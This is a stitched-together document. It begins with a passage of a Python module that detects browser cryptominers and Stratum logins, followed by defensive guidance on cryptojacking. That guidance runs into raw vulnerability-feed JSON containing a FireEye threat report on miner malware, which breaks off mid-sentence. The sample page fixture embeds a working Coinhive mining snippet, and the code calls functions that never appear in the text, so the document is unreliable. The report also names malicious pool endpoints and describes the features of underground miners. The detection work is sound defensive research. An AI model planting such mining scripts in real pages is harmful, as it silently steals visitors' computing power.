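# Page-content indicators: known miner script names, Coinhive's public
# constructors (CoinHive.Anonymous / CoinHive.User, from Coinhive's own API
# docs, not from this page) and "/proxy" WebSocket endpoints of self-hosted
# Stratum proxies.
SCRIPT_NAME = re.compile(r"(coinhive|authedmine|crypto-?loot|deepminer)[\w.-]*\.js", re.I)
MINER_CTOR = re.compile(r"\bCoinHive\.(Anonymous|User)\s*\(", re.I)
WS_PROXY = re.compile(r"wss?://[^\s'\"<>]+/proxy\b", re.I)


def browser_miner_indicators(page: str) -> dict:
    """Return the miner script names, constructor calls and WebSocket proxy
    endpoints found in page content (empty lists when none)."""
    return {
        "scripts": sorted({m.group(0) for m in SCRIPT_NAME.finditer(page)}),
        "constructors": sorted({m.group(0) for m in MINER_CTOR.finditer(page)}),
        "ws_proxies": sorted({m.group(0) for m in WS_PROXY.finditer(page)}),
    }


# Constructed samples: placeholder wallet (right length and alphabet only),
# one XMRig login plus its response, one Stratum v1 subscribe, one HTTP line.
FAKE_WALLET = "4" + "A" * 94
SAMPLE_STRATUM = (
    b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"'
    + FAKE_WALLET.encode() + b'.rig1","pass":"x","agent":"XMRig/2.6.0"}}\n'
    b'{"id":1,"jsonrpc":"2.0","error":null,"result":{"status":"OK"}}\n'
    b'{"id":2,"method":"mining.subscribe","params":["cpuminer-multi/1.3.1"]}\n'
    b"GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n"
)
SAMPLE_PAGE = """<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITEKEY'); miner.start();</script>
<script>var ws = new WebSocket('wss://ws.example.invalid:8443/proxy');</script>"""

if __name__ == "__main__":
    for method, wallet, agent in stratum_findings(SAMPLE_STRATUM):
        tag = "monero-wallet" if looks_like_monero_wallet(wallet) else wallet
        print(method, agent, tag)
    print(browser_miner_indicators(SAMPLE_PAGE))
```

Running the module on the constructed samples reports the XMRig login (agent XMRig/2.6.0, wallet-shaped login) and the Stratum v1 subscribe while ignoring the pool's response and the HTTP line, and flags the script name, the constructor call and the WebSocket proxy endpoint in the page. The same functions can be fed reassembled TCP streams from a sensor or fetched page bodies; the wallet check is there so that a hit on a real address can be pivoted to pool-side lookups.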
However, the downside to blacklisting pool addresses is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can be difficult and time consuming.

##### Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult, since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining, so will the techniques used by actors; however, blocking some of the most common indicators we have observed to date may be effective in combating a significant amount of the CPU-draining mining activity that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

 * Blocking domains known to have hosted coin mining scripts
 * Blocking the websites of known mining projects, such as Coinhive
 * Blocking scripts altogether
 * Using an ad blocker or coin mining-specific browser add-ons
 * Detecting commonly used naming conventions
 * Alerting on and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking mining functionality included in existing financial malware as well as in mining-specific malware families.

It is important to note that the JavaScript used in browser-based cryptojacking cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging the cache and other browser data.

#### Outlook

In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers.
These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.\n\nDue to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.\n\nBecause of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. 
Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-18T14:00:00", "type": "fireeye", "title": "How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape:\nThe Growth of Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0099", "CVE-2017-10271"], "modified": "2018-07-18T14:00:00", "id": "FIREEYE:42E1F284AEBD41C72EC6CD12CDCCD0A6", "href": "https://www.fireeye.com/blog/threat-research/2018/07/cryptocurrencies-cyber-crime-growth-of-miners.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:22", "description": "#### Introduction\n\nCyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This [interest has increased in recent years](<https://www.fireeye.com/blog/threat-research/2018/04/cryptocurrencies-cyber-crime-blockchain-infrastructure-use.html>), stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. 
Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.\n\nThis blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.\n\n#### What Is Mining?\n\nAs transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into \"blocks\" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the \"chain\" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called \"pools\" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. 
Figure 1 illustrates the roles miners play in the blockchain network.\n\n \nFigure 1: The role of miners\n\n#### Underground Interest\n\nFireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.\n\n \nFigure 2: Underground keyword mentions\n\n#### Monero Is King\n\nThe majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called \"ring signatures,\" which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are infeasible to recover through blockchain analysis, ensuring that Monero transactions cannot be linked while also being cryptographically secure.\n\nThe Monero blockchain also uses a \"memory-hard\" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. 
Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.\n\n#### Underground Advertisements for Miners\n\nBecause most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.\n\n| **XMR Mining Utilities** |\n| --- |\n| XMR-STACK |\n| MINERGATE |\n| XMRMINER |\n| CCMINER |\n| XMRIG |\n| CLAYMORE |\n| SGMINER |\n| CAST XMR |\n| LUKMINER |\n| CPUMINER-MULTI |\n\nTable 1: Commonly used Monero miner utilities\n\nThe following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.\n\n##### Sample Advertisement #1 (Smart Miner + Builder)\n\nIn early April 2018, actor \"Mon\u00a3y\" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD \u2013 payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero \u2013 that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. 
According to the actor, Monero Madness also provides the following features:\n\n * Unlimited builds\n * Builder GUI (Figure 4)\n * Written in AutoIT (no dependencies)\n * FUD\n * Safer error handling\n * Uses most recent XMRig code\n * Customizable pool/port\n * Packed with UPX\n * Works on all Windows OS (32- and 64-bit)\n * Madness Mode option\n\n \nFigure 3: Monero Madness\n\n \nFigure 4: Monero Madness builder\n\n##### Sample Advertisement #2 (Miner + Telegram Bot Builder)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"kent9876\" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:\n\n * Written in C/C++\n * Build size is small (about 100\u2013150 kB)\n * Hides miner process from popular task managers\n * Can run without Administrator privileges (user-mode)\n * Auto-update ability\n * All data encoded with 256-bit key\n * Access to Telegram bot-builder\n * Lifetime support (24/7) via Telegram\n\n \nFigure 5: Goldig Miner advertisement\n\n##### Sample Advertisement #3 (Miner + Credential Stealer)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"TH3FR3D\" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. 
According to the advertisement, the Felix tool boasted the following features:\n\n * Written in C# (Version 1.0.1.0)\n * Browser stealer for all major browsers (cookies, saved passwords, auto-fill)\n * Monero miner (uses minergate.com pool by default, but can be configured)\n * Filezilla stealer\n * Desktop file grabber (.txt and more)\n * Can download and execute files\n * Update ability\n * USB spreader functionality\n * PHP web panel\n\n \nFigure 6: Felix HTTP\n\n##### Sample Advertisement #4 (Miner + RAT)\n\nIn January 2018, FireEye iSIGHT Intelligence observed actor \"ups\" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the [CVE-2016-0099](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032>) exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for \u20ac200 EUR, or \u20ac325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. 
According to the actor, the tool offered the following:\n\n_Windows Build Specifics_\n\n * Written in C++ (no dependencies)\n * Miner component based on XMRig\n * Easy cryptor and VPS hosting options\n * Web panel (Figure 7)\n * Uses TLS for secured communication\n * Download and execute\n * Auto-update ability\n * Cleanup routine\n * Receive remote commands\n * Perform privilege escalation\n * Features \"game mode\" (mining stops if user plays game)\n * Proxy feature (based on XMRig)\n * Support (for \u20ac20/month)\n * Kills other miners from list\n * Hidden from TaskManager\n * Configurable pool, coin, and wallet (via panel)\n * Can mine the following Cryptonight-based coins:\n   * Monero\n   * Bytecoin\n   * Electroneum\n   * DigitalNote\n   * Karbowanec\n   * Sumokoin\n   * Fantomcoin\n   * Dinastycoin\n   * Dashcoin\n   * LeviarCoin\n   * BipCoin\n   * QuazarCoin\n   * Bitcedi\n\n_Linux Build Specifics_\n\n * Issues running on Linux servers (higher performance on desktop OS)\n * Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)\n\n \nFigure 7: Miner bot web panel\n\n##### Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)\n\nIn August 2017, actor \"MeatyBanana\" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. 
Ostensibly, the tool works with CPUs only and offers the following features:\n\n * Configurable miner pool and port (default to minergate)\n * Compatible with both 64- and 86-bit Windows OS\n * Hides from the following popular task managers:\n   * Windows Task Manager\n   * Process Killer\n   * KillProcess\n   * System Explorer\n   * Process Explorer\n   * AnVir\n   * Process Hacker\n * Masked as a system driver\n * Does not require administrator privileges\n * No dependencies\n * Registry persistence mechanism\n * Ability to perform \"tasks\" (download and execute files, navigate to a site, and perform DDoS)\n * USB spreader\n * Support after purchase\n\n#### The Cost of Cryptojacking\n\nThe presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:\n\n 1. Degradation in system performance\n 2. Increased cost in electricity\n 3. Potential exposure of security holes\n\nCryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.\n\nIn the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominantly rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU or network load could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.\n\nThe electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. 
The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.\n\nCryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as [TRITON](<https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html>).\n\n#### Cryptocurrency Miner Distribution Techniques\n\nIn order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:\n\n * User endpoint machines\n * Enterprise servers\n * Websites\n * Mobile devices\n * Industrial control systems\n\n##### Cryptojacking in the Cloud\n\nPrivate sector companies and governments alike are increasingly [moving their data and applications to the cloud](<https://www.fireeye.com/blog/executive-perspective/2018/04/anatomy-of-a-public-cloud-compromise.html>), and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. 
Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.\n\nThe following are some real-world examples of cryptojacking in the cloud:\n\n * In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the [post-exploitation and pre-mining dissemination techniques](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>) used in those campaigns.\n * In March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/coinminer-campaigns-move-to-the-cloud-via-docker-kubernetes/>) on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.\n * In February 2018, [Bleeping Computer also reported](<https://www.bleepingcomputer.com/news/security/tesla-internal-servers-infected-with-cryptocurrency-miner/>) on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web Services (AWS) S3 cloud environment. 
Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.\n * Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the [LA Times online compromise](<https://www.theregister.co.uk/2018/02/22/la_times_amazon_aws_s3/>) in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.\n\n##### Incorporation of Cryptojacking into Existing Botnets\n\nFireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.\n\nThe following are some real-world examples of cryptojacking being incorporated into existing botnets:\n\n * In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.\n * On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. 
The IcedID injects launched an anonymous miner using the mining code from Coinhive's [AuthedMine](<https://authedmine.com/lib/authedmine.min.js>).\n * In late 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/codefork-group-uses-fileless-malware-to-deploy-monero-miners/>) that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.\n * In late 2017, FireEye researchers observed Trickbot operators deploy a new module named \"testWormDLL\" that is a statically compiled copy of the popular XMRig Monero miner.\n * On Aug. 29, 2017, [Security Week reported](<https://www.securityweek.com/jimmy-banking-trojan-reuses-nukebot-code>) on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.\n\n#### Drive-By Cryptojacking\n\n##### In-Browser\n\nFireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. 
Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.\n\nThe following are some real-world examples of Coinhive being deployed in the wild:\n\n * In September 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/chrome-extension-embeds-in-browser-monero-miner-that-drains-your-cpu/>) that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.\n * During mid-September 2017, [users on Reddit](<https://www.reddit.com/r/thepiratebay/comments/70aip7/100_cpu_on_all_8_threads_while_visiting_tpb/?sort=new>) began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).\n * In December 2017, researchers with [Sucuri reported](<https://blog.sucuri.net/2017/12/malicious-cryptominers-from-github.html>) on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.\n * Other reporting disclosed the Coinhive script being embedded on the [Showtime domain](<https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/>) as well as on the [LA Times website](<https://www.itwire.com/security/81860-la-times-serving-cryptocurrency-mining-script.html>), both surreptitiously mining Monero.\n * A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user\u2019s web browser is open. 
However, [researchers with Malwarebytes Labs](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>) uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and more advanced actions like running the Task Manager may be required.\n\n \nFigure 8: Statement from TPB operators on Coinhive script\n\n##### Malvertising and Exploit Kits\n\nMalvertisements \u2013 malicious ads on legitimate websites \u2013 commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.\n\nThe following are some real-world examples of this activity:\n\n * In early 2018, [researchers with Trend Micro reported](<https://www.bleepingcomputer.com/news/security/coinhive-cryptojacker-deployed-on-youtube-via-google-ads/>) that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script _coinhive.min.js_, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. 
This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.\n * In April 2018, researchers with [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-web-miner-script-injected-into-aol-advertising-platform/>) also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.\n * Since July 16, 2017, [FireEye has observed](<https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html>) the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.\n * In January 2018, [Check Point researchers](<https://research.checkpoint.com/new-rig-exploit-kit-campaign-dropping-xmrig-miner/>) discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.\n\n#### Mobile Cryptojacking\n\nIn addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. 
Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.\n\nThe following are some real-world examples of mobile devices being used for cryptojacking:\n\n * During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:\n   * In March 2014, Android malware named \"CoinKrypt\" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.\n   * In March 2014, another form of Android malware \u2013 \"Android.Trojan.MuchSad.A\" or \"ANDROIDOS_KAGECOIN.HBT\" \u2013 was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including \"Football Manager Handheld\" and \"TuneIn Radio.\" Variants of this malware have reportedly been downloaded by millions of Google Play users.\n   * In April 2014, Android malware named \"BadLepricon,\" which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.\n   * In October 2014, a type of mobile malware called \"Android Slave\" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.\n * In December 2017, [researchers with Kaspersky Labs reported](<https://securelist.com/jack-of-all-trades/83470/>) on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. 
It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.\n * In January 2018, [SophosLabs released a report](<https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-coinminer-and-other-malicious-cryptominers-tpna.pdf?la=en>) detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.\n * Between November 2017 and January 2018, [researchers with Malwarebytes Labs reported](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.\n\n#### Cryptojacking Spam Campaigns\n\nFireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code for as long as cryptocurrency mining remains profitable.\n\nIn late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Christchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. 
The malicious miner connected to the pools supportxmr.com and nanopool.org.\n\n \nFigure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner\n\nAdditionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).\n\n| **ZIP Filenames** |\n| --- |\n| california_540_tax_form_2013_instructions.exe |\n| state_bank_of_india_money_transfer_agency.exe |\n| format_transfer_sms_banking_bni_ke_bca.exe |\n| confirmation_receipt_letter_sample.exe |\n| sbi_online_apply_2015_po.exe |\n| estimated_tax_payment_coupon_irs.exe |\n| how_to_add_a_non_us_bank_account_to_paypal.exe |\n| western_union_money_transfer_from_uk_to_bangladesh.exe |\n| can_i_transfer_money_from_bank_of_ireland_to_aib_online.exe |\n| how_to_open_a_business_bank_account_with_bad_credit_history.exe |\n| apply_for_sbi_credit_card_online.exe |\n| list_of_lucky_winners_in_dda_housing_scheme_2014.exe |\n\nTable 2: Sampling of observed ZIP filenames delivering cryptocurrency miner\n\n#### Cryptojacking Worms\n\nFollowing the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>). 
Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.\n\nThe following are some real-world examples of cryptojacking worms:\n\n * In May 2017, [Proofpoint reported](<https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar>) a large campaign distributing mining malware \"Adylkuzz.\" This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.\n * Security researchers with [Sensors identified](<https://sensorstechforum.com/w32-rarogminer-monero-miner-worm-lsass-exe-remove/>) a Monero miner worm, dubbed \"Rarogminer,\" in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.\n * In January 2018, [researchers at F5](<https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar>) discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is a Python-based bot that spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python 